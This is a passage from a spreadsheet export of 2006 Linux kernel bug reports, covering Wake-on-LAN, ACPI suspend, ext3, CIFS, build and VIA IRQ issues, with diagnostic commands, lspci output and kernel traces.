4: 2629 XT-PIC serial 5: 47373 XT-PIC NE2000 7: 10523508 XT-PIC parport0 8: 831086 RTC +timer 12: 138 XT-PIC i8042 14: 22 XT-PIC +ide0 22: 18935 PYXIS timer-cascade 23: 0 PYXIS isa-cascade 24: 278651 PYXIS eth0 26: 15 PYXIS aic7xxx 27: 55800 PYXIS aic7xxx</t>
  </si>
  <si>
    <t>Nforce4 mobo won't WOL</t>
  </si>
  <si>
    <t>2006-05-22 14:34 UTC</t>
  </si>
  <si>
    <t>David Mathog</t>
  </si>
  <si>
    <t>2009-02-20 12:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none known Distribution: 2.6.16.16 Hardware Environment: Asus A8N5X Software Environment:Mandriva 2006, forcedeth ethernet driver This BIOS setting is relevant: BIOS -&gt; POWER -&gt; APM config -&gt; Poweron by PCI devices=ENABLED description in BIOS is: Disable/Enable PME to wake up from S5 by PCI devices and NV onboard LAN. BIOS version 0902 Problem Description: Following poweroff from linux the computer will not respond to an WOL magic packet. When the same machine is powered off from Windows XP it responds to an WOL magic packet and wakes up normally. Things that were tried to enable WOL: ethtool -s eth0 wol g poweroff Donald' Becker's pci-config as: pci-config -#11 -S #executed immediately before /sbin/halt in /etc/rc.d/init.d/halt echo "MMAC" &gt;/proc/acpi/wakeup poweroff None of these had any effect singly or in combination. Steps to reproduce: Install linux: (in this case, Mandriva 2006 2.6.12-12mdk) poweroff WOL fails Upgrade to kernel 2.6.16.9 or 2.6.16.16 poweroff WOL fails Boot to Windows XP during any of this Shutdown WOL works</t>
  </si>
  <si>
    <t>Lukas Hejtmanek</t>
  </si>
  <si>
    <t>2.6.16.17</t>
  </si>
  <si>
    <t>dummy interface broadcast destination hardware address is not ff:ff:ff:ff:ff:ff</t>
  </si>
  <si>
    <t>2006-05-23 16:14 UTC</t>
  </si>
  <si>
    <t>2007-11-02 09:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce: ifconfig dummy0 Link encap:Ethernet HWaddr C2:54:E2:F3:38:08 inet addr:192.168.100.1 Bcast:192.168.100.255 Mask:255.255.255.0 tcpdump -XX -i dummy0 icmp ping -b -c 1 192.168.100.255</t>
  </si>
  <si>
    <t>S3: resume poweroff due to outstanding button event</t>
  </si>
  <si>
    <t>2.6.16.13</t>
  </si>
  <si>
    <t>2006-05-24 14:52 UTC</t>
  </si>
  <si>
    <t>Henrique de Moraes Holschuh</t>
  </si>
  <si>
    <t>2006-06-25 21:37 UTC</t>
  </si>
  <si>
    <t>Arnaud Patard</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: n/a Distribution: Mainline 2.6.16.13 + acpi-release-20060310-2.6.16 patches Hardware Environment: Thinkpad T43 2687 Software Environment: Debian Problem Description: Resuming from S3 (suspend-to-ram) using the power button causes a stray power-button event which shutdowns the machine. Apparently, ACPI 3.0 P62 says the kernel should be cleaning up the stray powerbutton event, instead of letting userspace deal with the mess. There is an analysis and patch about this issue at http://article.gmane.org/gmane.linux.acpi.devel/17555 I am just reporting the bug (which I verified), and the possible solution by Mr. Arnaud Patard in the above mentioned post. Steps to reproduce: boot with a kernel using acpi_sleep=s3_bios do echo mem &gt; /sys/power/state (preferably using a properly setup hibernate script) wake machine up using the power button</t>
  </si>
  <si>
    <t>2.6.17</t>
  </si>
  <si>
    <t>io_scsi</t>
  </si>
  <si>
    <t>kernel BUG at fs/ext3/namei.c:383</t>
  </si>
  <si>
    <t>2.6.16.18</t>
  </si>
  <si>
    <t>2006-05-30 21:48 UTC</t>
  </si>
  <si>
    <t>Georg Funke</t>
  </si>
  <si>
    <t>2008-03-24 13:04 UTC</t>
  </si>
  <si>
    <t>Theodore Tso</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Ubuntu 6.06 Hardware Environment: Mobile AMD Sempron(tm) Processor 2800+ Software Environment: Gnu C 4.0.3 Gnu make 3.81beta4 binutils 2.16.91 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.38 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Procps 3.2.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.93 udev 079 Modules Loaded sd_mod usb_storage scsi_mod binfmt_misc nls_iso8859_15 nls_cp850 vfat fat ipv6 lp af_packet usbhid uhci_hcd ehci_hcd usbcore parport_pc parport Problem Description:kernel BUG at fs/ext3/namei.c:383! invalid opcode: 0000 [#1] Modules linked in: sd_mod usb_storage scsi_mod binfmt_misc nls_iso8859_15 nls_cp 850 vfat fat ipv6 lp af_packet usbhid uhci_hcd ehci_hcd usbcore parport_pc parpo rt CPU: 0 EIP: 0060:[&lt;c0198db8&gt;] Not tainted VLI EFLAGS: 00010292 (2.6.16.18 #38) EIP is at dx_probe+0xf8/0x310 eax: 00000081 ebx: ce102000 ecx: c03430fc edx: c03430fc esi: ce102018 edi: cdf281e4 ebp: c179d6cc esp: ce0c4ce4 ds: 007b es: 007b ss: 0068 Process trashapplet (pid: 6401, threadinfo=ce0c4000 task=ce683030) Stack: &lt;0&gt;c0306888 c02eca67 c0304b22 0000017f c0306ebc ce0c4dd4 00000000 402f755 4 00000000 00000000 c0dd4000 ce0c4de4 ce0c4dbc ce0c4e6c c019a173 ce0c4dbc ce0c4de4 00000000 00000000 00000000 00000000 00000000 d2ecb190 ce0c4db4 Call Trace: [&lt;c019a173&gt;] ext3_find_entry+0x2b3/0x610 [&lt;c0163273&gt;] do_lookup+0x53/0x150 [&lt;c016bb53&gt;] dput+0x93/0x130 [&lt;c019adea&gt;] ext3_lookup+0x3a/0xa0 [&lt;c0163345&gt;] do_lookup+0x125/0x150 [&lt;c0163a75&gt;] __link_path_walk+0x705/0xd30 [&lt;c01640ef&gt;] link_path_walk+0x4f/0xe0 [&lt;c0164546&gt;] do_path_lookup+0xe6/0x210 [&lt;c0162043&gt;] getname+0xb3/0xe0 [&lt;c0164c7b&gt;] __user_walk_fd+0x3b/0x60 [&lt;c015e23f&gt;] vfs_lstat_fd+0x1f/0x50 [&lt;c015ea5f&gt;] sys_lstat64+0xf/0x30 [&lt;c01141ed&gt;] handle_vm86_trap+0x2d/0xf0 [&lt;c0102d13&gt;] sysenter_past_esp+0x54/0x75 Code: 44 24 10 bc 6e 30 c0 c7 44 24 0c 7f 01 00 00 c7 44 24 08 22 4b 30 c0 c7 44 24 04 67 ca 2e c0 c7 04 24 88 68 30 c0 e8 f8 25 f8 ff &lt;0f&gt; 0b 7f 01 22 4b 30 c0 8b 44 24 3c c7 44 24 20 00 00 00 00 89 Steps to reproduce: Plug in a IDE Drive with a USB 2.0 Interface</t>
  </si>
  <si>
    <t>AML method trace support</t>
  </si>
  <si>
    <t>2.6.X</t>
  </si>
  <si>
    <t>2006-05-30 23:32 UTC</t>
  </si>
  <si>
    <t>2008-02-10 14:20 UTC</t>
  </si>
  <si>
    <t>The feature is about to eanble trace a individual AML method.</t>
  </si>
  <si>
    <t>cifs mount does not survive suspend2ram,resume</t>
  </si>
  <si>
    <t>2006-05-31 12:57 UTC</t>
  </si>
  <si>
    <t>Xu</t>
  </si>
  <si>
    <t>2006-07-11 01:54 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: OpenSuse 10.1 Hardware Environment: x86 Software Environment: cifs module: version: 1.42 vermagic: 2.6.17-rc4 preempt mod_unload PENTIUM4 REGPARM gcc-4.1 Problem Description: Accessing cifs shares using the cifs kernel module (and a samba 3.0.22 daemon at the server side) works fine. However, after a suspend2ram,resume-cycle, accessing the mounted files or directories does not work anymore. Accesses return immediately with -EIO (Input/output error) Steps to reproduce: 1. mount a cifs share (say "/mnt/test") 2. Try to access the cifs share (e.g. "stat /mnt/test"). This works as fine. 3. Do a suspend2ram,resume-cycle (e.g. "echo mem &gt;/sys/power/state" and resume) 4. Try to access the cifs share (e.g. "stat /mnt/test"). This does not work. You get the error message: stat: cannot stat `/mnt/test': Input/output error Note that unmounting and mounting the share works most of the time (but only if no process had any files of the cifs share open). Sometimes unounting does not work. In this case, messages like the following appear in the syslog: May 31 20:09:38 notebook2 kernel: CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_0 May 31 20:09:58 notebook2 kernel: CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_1 May 31 20:10:18 notebook2 kernel: CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_2 May 31 20:10:38 notebook2 kernel: CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_3 May 31 20:10:58 notebook2 kernel: CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_4 May 31 20:11:18 notebook2 kernel: CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_5 May 31 20:11:38 notebook2 kernel: CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_6 May 31 20:11:58 notebook2 kernel: CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_7 (Maybe this is related to an application on the client trying to stat every entry of a directory.) Note that there seems to be a 20 seconds rythm of each message line. But if suspend2ram is tried again, such a message line is printed even if 20 seconds have not passed by. However, suspend2ram is not successful in this case, yielding a syslog message like: May 31 20:12:11 notebook2 [acpid]: received event "button/power PWRF 00000080 00000002" May 31 20:12:12 notebook2 [acpid]: notifying client 3494[0:0] May 31 20:12:12 notebook2 [acpid]: notifying client 3579[0:0] May 31 20:12:12 notebook2 [acpid]: client has disconnected May 31 20:12:12 notebook2 [acpid]: notifying client 5135[0:0] May 31 20:12:12 notebook2 [acpid]: notifying client 3579[0:0] May 31 20:12:12 notebook2 [acpid]: completed event "button/power PWRF 00000080 00000002" May 31 20:12:13 notebook2 kernel: PM: Preparing system for mem sleep May 31 20:12:33 notebook2 kernel: Stopping tasks: ======================================&lt;3&gt; CIFS VFS: Error 0xffffff90 on cifs_get_inode_info in lookup of /some/path/some_file_name_8 May 31 20:12:33 notebook2 kernel: ====================================================================================================================================== May 31 20:12:33 notebook2 kernel: stopping tasks timed out after 20 seconds (1 tasks remaining): May 31 20:12:33 notebook2 kernel: cifsd May 31 20:12:33 notebook2 kernel: Restarting tasks...&lt;6&gt; Strange, cifsd not stopped May 31 20:12:36 notebook2 kernel: done</t>
  </si>
  <si>
    <t>semaphore/mutex/spinlock optimization</t>
  </si>
  <si>
    <t>2006-05-31 22:33 UTC</t>
  </si>
  <si>
    <t>2008-06-13 20:15 UTC</t>
  </si>
  <si>
    <t>acpi_os_create_semaphore() almost always ask for binary semaphores rather than counting semaphores. Linux now has an optimized mutex implementation to provide binary semaphores as mutexes. While lighter weight, the mutex implementation shares the properties of semaphores in that they can sleep and thus must not be called from interrupt context. Further, since they may sleep, they are most appropriate for critical sections of duration longer than context switch time. Linux also provides spin locks, which are minimal overhead, and can be called at interrupt context. However, it is forbidden to sleep while holding a spin lock. It would be more optimal if the ACPICA/OSL interface allowed ACPICA to take advantage of these different locks. Note that it will require more than recognizing use_count == 1 in acpi_os_create_semaphore(), as the three locks have different lock/unlock calling syntax, and different semantics in their ability to sleep or not. Note that if they are split out, that a non-Linux OS could still implement them all using semaphores if they desired.</t>
  </si>
  <si>
    <t>Stefan Schmidt</t>
  </si>
  <si>
    <t>2.6.16.19</t>
  </si>
  <si>
    <t>undefined reference to `pci_get_legacy_ide_irq'</t>
  </si>
  <si>
    <t>2006-06-04 15:33 UTC</t>
  </si>
  <si>
    <t>Quanah Gibson-Mount</t>
  </si>
  <si>
    <t>2007-02-02 17:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Red Hat Enterprise Linux AS release 4 (Nahant Update 3) Hardware Environment: IA64 Software Environment: Red Hat Enterprise Linux AS release 4 (Nahant Update 3) Problem Description: 2.6.16.19 fails to build Steps to reproduce: make menuconfig accept default options make AS arch/ia64/lib/memcpy_mck.o AS arch/ia64/lib/memset.o AS arch/ia64/lib/strlen.o AS arch/ia64/lib/strlen_user.o AS arch/ia64/lib/strncpy_from_user.o AS arch/ia64/lib/strnlen_user.o AS arch/ia64/lib/xor.o AR arch/ia64/lib/lib.a GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o(.text+0x134952): In function `init_hwif_amd74xx': drivers/ide/pci/amd74xx.c:423: undefined reference to `pci_get_legacy_ide_irq'</t>
  </si>
  <si>
    <t>patch-2.6.16.16-17: VIA IRQ Fixup broken, results in problems with USB</t>
  </si>
  <si>
    <t>2006-06-05 06:56 UTC</t>
  </si>
  <si>
    <t>Sven Kockrick</t>
  </si>
  <si>
    <t>2006-09-27 09:26 UTC</t>
  </si>
  <si>
    <t>Chris Wedgwood</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16.17 Distribution: Debian Etch, vanilla kernel from ftp.kernel.org Hardware Environment: Laptop Sony VAIO PCG-FR215E (AMD Athlon) Software Environment: Problem Description: Kernel 2.6.16.16 works fine. Starting with 2.6.16.17, there are following messages on boot: ehci_hcd 0000:00:10.3: Unlink after no-IRQ? Controller is probably using the wrong IRQ. usb 1-1: device not accepting address 2, error -110 usb 1-1: new high speed USB device using ehci_hcd and address 3 usb 1-1: device not accepting address 3, error -110 [....] several further addresses are probed in ascending order, always with same result (error). This bug is probably related to the patch of drivers/pci/quirk.c in patch-2.6.16.16-17. I tried to re-insert the line 'DECLARE_PCI_FIXUP_ENABLE(PCI_VENDOR_ID_VIA, PCI_ANY_ID, quirk_via_irq);' after 'DECLARE_PCI_FIXUP_ENABLE(PCI_VENDOR_ID_VIA, PCI_DEVICE_ID_VIA_82C686_5, quirk_via_irq);' (line no. 658). With this change, the machine booted as usual, without problems. But i am not a programmer and have no idea what i did ;-) Output of lspci -vvv: ------------ lspci -vvv ----------------- 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT8366/A/7 [Apollo KT266/A/333] Subsystem: Sony Corporation: Unknown device 8143 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e8000000 (32-bit, prefetchable) [size=128M] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP+ GART64- 64bit- FW- Rate=x4 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT8366/A/7 [Apollo KT266/A/333 AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: e1000000-e1ffffff Prefetchable memory behind bridge: f0000000-f7ffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0c.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (8000ns min, 16000ns max) Interrupt: pin A routed to IRQ 9 Region 0: I/O ports at 1400 [size=256] Region 1: Memory at e0000000 (32-bit, non-prefetchable) [size=512] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0e.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev aa) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168 Interrupt: pin A routed to IRQ 11 Region 0: Memory at 38000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=00, secondary=02, subordinate=05, sec-latency=176 Memory window 0: 30000000-31fff000 (prefetchable) Memory window 1: 32000000-33fff000 I/O window 0: 00002000-000020ff I/O window 1: 00002400-000024ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset- 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 0000:00:0e.1 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev aa) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168 Interrupt: pin B routed to IRQ 9 Region 0: Memory at 38001000 (32-bit, non-prefetchable) [size=4K] Bus: primary=00, secondary=06, subordinate=09, sec-latency=176 Memory window 0: 34000000-35fff000 (prefetchable) Memory window 1: 36000000-37fff000 I/O window 0: 00002800-000028ff I/O window 1: 00002c00-00002cff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset- 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 0000:00:0e.2 FireWire (IEEE 1394): Ricoh Co Ltd R5C552 IEEE 1394 Controller (rev 02) (prog-if 10 [OHCI]) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 255 Region 0: Memory at e0000800 (32-bit, non-prefetchable) [disabled] [size=2K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME- 0000:00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 11 Region 4: I/O ports at 1020 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 0000:00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 64, Cache Line Size: 0x08 (32 bytes) Interrupt: pin B routed to IRQ 9 Region 4: I/O ports at 1040 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, Cache Line Size: 0x08 (32 bytes) Interrupt: pin C routed to IRQ 11 Region 4: I/O ports at 1060 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) (prog-if 20 [EHCI]) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, Cache Line Size: 0x10 (64 bytes) Interrupt: pin D routed to IRQ 9 Region 0: Memory at e0000400 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 11 Region 4: I/O ports at 1000 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 11 Region 0: I/O ports at 1800 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.6 Communication controller: VIA Technologies, Inc. AC'97 Modem Controller (rev 80) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 255 Region 0: I/O ports at 1c00 [disabled] [size=256] Capabilities: [d0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:01:00.0 VGA compatible controller: nVidia Corporation NV17 [GeForce4 420 Go] (rev a3) (prog-if 00 [VGA]) Subsystem: Sony Corporation: Unknown device 8143 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 248 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 11 Region 0: Memory at e1000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at f4000000 (32-bit, prefetchable) [size=64M] Region 2: Memory at f0000000 (32-bit, prefetchable) [size=512K] Expansion ROM at f0080000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA- ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=32 ArqSz=0 Cal=0 SBA- AGP+ GART64- 64bit- FW- Rate=x4 -------------End of lspci -vvv ------- Output of /proc/interrupts: CPU0 0: 600906 XT-PIC timer 1: 5939 XT-PIC i8042 2: 0 XT-PIC cascade 7: 585 XT-PIC parport0 8: 4 XT-PIC rtc 9: 119738 XT-PIC acpi, ehci_hcd:usb1, uhci_hcd:usb3, yenta, eth0 11: 127662 XT-PIC uhci_hcd:usb2, uhci_hcd:usb4, yenta, VIA8233, nvidia 12: 1546 XT-PIC i8042 14: 22039 XT-PIC ide0 15: 18751 XT-PIC ide1 NMI: 0 LOC: 600852 ERR: 92 MIS: 0 Output of /proc/iomem: 00000000-0009f7ff : System RAM 0009f800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cfbff : Video ROM 000f0000-000fffff : System ROM 00100000-1feeffff : System RAM 00100000-002b48e8 : Kernel code 002b48e9-00364c23 : Kernel data 1fef0000-1fefbfff : ACPI Tables 1fefc000-1fefffff : ACPI Non-volatile Storage 1ff00000-1fffffff : reserved 30000000-31ffffff : PCI CardBus #02 32000000-33ffffff : PCI CardBus #02 34000000-35ffffff : PCI CardBus #06 36000000-37ffffff : PCI CardBus #06 38000000-38000fff : 0000:00:0e.0 38000000-38000fff : yenta_socket 38001000-38001fff : 0000:00:0e.1 38001000-38001fff : yenta_socket e0000000-e00001ff : 0000:00:0c.0 e0000000-e00001ff : 8139too e0000400-e00004ff : 0000:00:10.3 e0000400-e00004ff : ehci_hcd e0000800-e0000fff : 0000:00:0e.2 e1000000-e1ffffff : PCI Bus #01 e1000000-e1ffffff : 0000:01:00.0 e1000000-e1ffffff : nvidia e8000000-efffffff : 0000:00:00.0 f0000000-f7ffffff : PCI Bus #01 f0000000-f007ffff : 0000:01:00.0 f0080000-f009ffff : 0000:01:00.0 f4000000-f7ffffff : 0000:01:00.0 f4000000-f4ffffff : vesafb fffe0000-ffffffff : reserved Output of /proc/ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 01f0-01f7 : ide0 0376-0376 : ide1 0378-037a : parport0 03c0-03df : vesafb 03f6-03f6 : ide0 04d0-04d1 : pnp 00:06 0cf8-0cff : PCI conf1 1000-100f : 0000:00:11.1 1000-1007 : ide0 1008-100f : ide1 1020-103f : 0000:00:10.0 1020-103f : uhci_hcd 1040-105f : 0000:00:10.1 1040-105f : uhci_hcd 1060-107f : 0000:00:10.2 1060-107f : uhci_hcd 1400-14ff : 0000:00:0c.0 1400-14ff : 8139too 1800-18ff : 0000:00:11.5 1800-18ff : VIA8233 1c00-1cff : 0000:00:11.6 2000-20ff : PCI CardBus #02 2400-24ff : PCI CardBus #02 2800-28ff : PCI CardBus #06 2c00-2cff : PCI CardBus #06 8000-807f : 0000:00:11.0 8000-807f : motherboard 8000-8003 : PM1a_EVT_BLK 8004-8005 : PM1a_CNT_BLK 8008-800b : PM_TMR 8010-8015 : ACPI CPU throttle 8020-8023 : GPE0_BLK 8100-810f : 0000:00:11.0 